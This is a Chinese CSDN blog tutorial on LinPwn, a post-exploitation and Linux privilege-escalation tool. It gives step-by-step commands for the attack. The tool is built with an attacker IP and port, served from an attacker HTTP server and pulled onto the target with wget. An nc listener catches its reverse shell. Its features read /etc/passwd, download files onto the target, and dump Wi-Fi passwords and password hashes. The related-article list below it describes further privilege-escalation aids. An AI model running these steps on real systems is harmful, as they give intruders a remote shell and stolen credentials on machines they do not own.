LinPwn —— 交互式的后渗透阶段枚举和提权辅助工具

最新推荐文章于 2023-08-10 09:37:56 发布
最新推荐文章于 2023-08-10 09:37:56 发布
阅读量324 收藏
点赞数
分类专栏: 内网渗透 文章标签: Linux 提权 LinPwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Shad0wpf/article/details/103489069
版权

LinPwn是一款交互式的后渗透阶段枚举和提权辅助工具。
Github:https://github.com/3XPL017/LinPwn

编译

克隆源码

git clone https://github.com/3XPL017/LinPwn.git

编辑LinPwn.cc文件,修改反弹连接IP及端口,然后必用build.sh编译

cd LinPwn
vi LinPwn.cc   #编辑反弹IP及端口

bash build.sh --default    #编译

上传LinPwn文件到靶机

编译成功后,文件夹下生成一个LinPwn,该文件上传到靶机上执行。
攻击端使用Python3开启一个HTTP服务

#攻击端IP为192.168.137.200,HTTP服务开启在8000端口

python3 -m http.server 8000

靶机上使用Wget下载文件

wget http://192.168.137.200:8000/LinPwn

连接

攻击端使用nc监听

#监听在1024端口,与LinPwn.cc中修改的端口保持一致
nc -lvp 1024

靶机上运行LinPwn

chmod _x LinPwn
./LinPwn

连接成功后,攻击端收到返回的系统信息

使用

  • shell - 执行靶机上的/bin/sh
    示例: (LinPwn: Shell) > id
    输入 exit 返回到 LinPwn.

  • readfile - 读取文件内容
    示例: (LinPwn: ReadFile)> /etc/passwd
    输入 exit 返回到 LinPwn.

  • enumerate - 运行 LinEnum.sh
    示例: (LinPwn) > enumerate

LinEnum运行结果显示在靶机上,辅助提权,偶尔不成功,可尝试多运行几次。
默认从Github上下载LinEnum.sh文件,国内网络或者内网使用可能下载不成功,可以修改LinPwn.cc代码中下载链接为攻击段地址,攻击端开启HTTP服务提供文件下载。

  • download - 下载文件到靶机
    示例: (LinPwn: Download) > https://exampleurl.com/file_to_download

  • wificredz - 获悉靶机上保持的Wifi密码

  • hashdump - 获取系统密码Hash
    在这里插入图片描述

Shad0wpf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
提权辅助工具
prettyX的博客
01-10 633
0X00 内容 Windows提权辅助工具:Windows-Exploit-Suggester介绍及使用 Linux提权辅助工具Linux Exploit Suggester 2介绍及使用 提权漏洞集合 0X01Windows-Exploit-Suggester介绍及使用 下载:https://github.com/GDSSecurity/Windows-Exploit-Sug...
web渗透--提权辅助工具Windows-Exploit-Suggester
朝阳似锦 晖映山河
09-23 444
辅助工具介绍 辅助工具Windows-Exploit-Suggester此工具将目标补丁与Microsoft漏洞数据库进行比较,以检测目标潜在的缺失补丁。 必须在python2环境中运行 python2 -m pip install xlrd python2 windows-exploit-suggester.py --update 得到2020-09-23-mssb.xls文件 python2 windows-exploit-suggester.py -h usage: windows-expl
提权辅助工具ATRoot Auxiliary
05-15
windows提权辅助工具,允许本地扩充,java编写,windows linux 漏洞比对工具
windows下提权辅助工具
黑白之道
03-24 619
大家好,我是Alex。今天给大家介绍几个工具方便在windows下提升权限。Windows-Exploit-Suggesterhttps://github.com/GDSSecurity/Windows-Exploit-Suggester它需要从Windows主机输出“systeminfo”命令,以便比较Microsoft安全公告数据库并确定主机的补丁级别。安装依赖关系python-xlrd,$
渗透利器 | 提权辅助工具
热门推荐
03-25 2万+
作为技术宅的我,日常最大的爱好就是逛论坛。某日看到论坛里有一款基于主机的漏洞扫描工具,用来查找主机上公开EXP的CVE。嗯嗯,我想还是叫提权辅助工具可能...
LinPwn.zip
12-11
LinPwn —— 交互式的后渗透阶段枚举提权辅助工具 使用方法:https://editor.csdn.net/md/?articleId=103489069
数据库系统概论实验2——交互式SQL.doc
06-08
数据库系统概论实验2——交互式SQL
LabVIEW Office 报告生成工具包提供了一个基于交互式配置的 Express VI——MS Office Report
07-03
LabVIEW Office 报告生成工具包提供了一个基于交互式配置的 Express VI——MS Office Report,(LabVIEW Office Report Generation Toolkit provides an Express VI-MS Office Report based on interactive ...
VR+AR+出版—— 多媒体交互教育教辅内容平台创业商业计划书.pdf
07-13
VR+AR+出版—— 多媒体交互教育教辅内容平台创业商业计划书.pdfVR+AR+出版—— 多媒体交互教育教辅内容平台创业商业计划书.pdfVR+AR+出版—— 多媒体交互教育教辅内容平台创业商业计划书.pdfVR+AR+出版—— 多媒体...
微信小程序——交互操作控件(截图+源码).zip
04-17
微信小程序——交互操作控件(截图+源码).zip 微信小程序——交互操作控件(截图+源码).zip 微信小程序——交互操作控件(截图+源码).zip 微信小程序——交互操作控件(截图+源码).zip 微信小程序——交互操作...
提权工具与补丁对比
02-27
KB952004:MS09-012/PR:KB952004 KB956572:MS09-012/巴西烤肉:KB956572 KB2393802:MS11-011:KB2393802 KB2592799:MS11-080:KB2592799 KB2621440:MS12-0203:KB2621440 KB2160329:MS10-048:KB2160329 KB970483:MS09-020/iis6提权(可能是):KB970483 KB2124261:MS10-065/IIS7提权(可能是):KB2124261 KB2271195:MS10-065/IIS7提权(可能是):KB2271195 KB977165:MS10-015:KB977165 KB2360937:MS10-084:KB2360937 KB2478960:MS11-014:KB2478960 KB2507938:MS11-056:KB2507938 KB2566454:MS11-062:KB2566454 KB2646524:MS12-003:KB2646524 KB2645640:MS12-009:KB2645640 KB2641653:MS12-018:KB2641653 KB944653:MS07-067:KB944653 KB952004:MS09-012:KB952004 KB971657:MS09-041:KB971657 KB2620712:MS11-097:KB2620712 KB942831:MS08-005:KB942831 KB2503665:MS11-046:KB2503665
Outlook 2007 Auxiliary Reference
06-04
This reference contains conceptual, reference, and code sample topics to guide you in developing solutions using MAPI and Outlook APIs that are exposed outside of the Outlook Object Model.
信息化教学助推高效课堂-——活用“交互式.docx
11-12
信息化教学助推高效课堂-——活用“交互式.docx
IEC 62908-1-2-2017触摸和交互式显示器——第1-2部分:总则——术语和字母符号.pdf
最新发布
05-05
IEC 62908-1-2-2017触摸和交互式显示器——第1-2部分:总则——术语和字母符号.pdf
pscp_pssh的非交互式操作
11-03
————————————————————————————————— ========使用方法=================================================== 主要由INSTALL pexpect.py pscp pssh scp_echo文件打包【pexpect-...
Windows操作系统——WindowsVulnScan提权辅助工具简介与使用教程
qq_50854662的博客
03-02 398
一、工具简介 说明: 这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。 本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长。 功能: 查找主机上具有的CVE 查找具有公开EXP的CVE 起因: 因为需要做一些主机漏洞扫描方面的工作,因而编写了这个简单的工具。之前也查找了几款类似的工具,如
Windows 提权
qq_53742230的博客
07-15 3636
Windows 一些提权手法总结
windows提权辅助在线平台
siu~
08-10 833
提权,网络术语,提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。
基于D3的交互式数据可视化实战
本书《数据可视化实战》是一本关于使用D3库创建交互式图表的实践指南,旨在帮助读者掌握数据可视化的基本技术和核心概念。通过本书,读者将学习如何使用D3库创建交互式图表,掌握必要的HTML、CSS、JavaScript和SVG...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值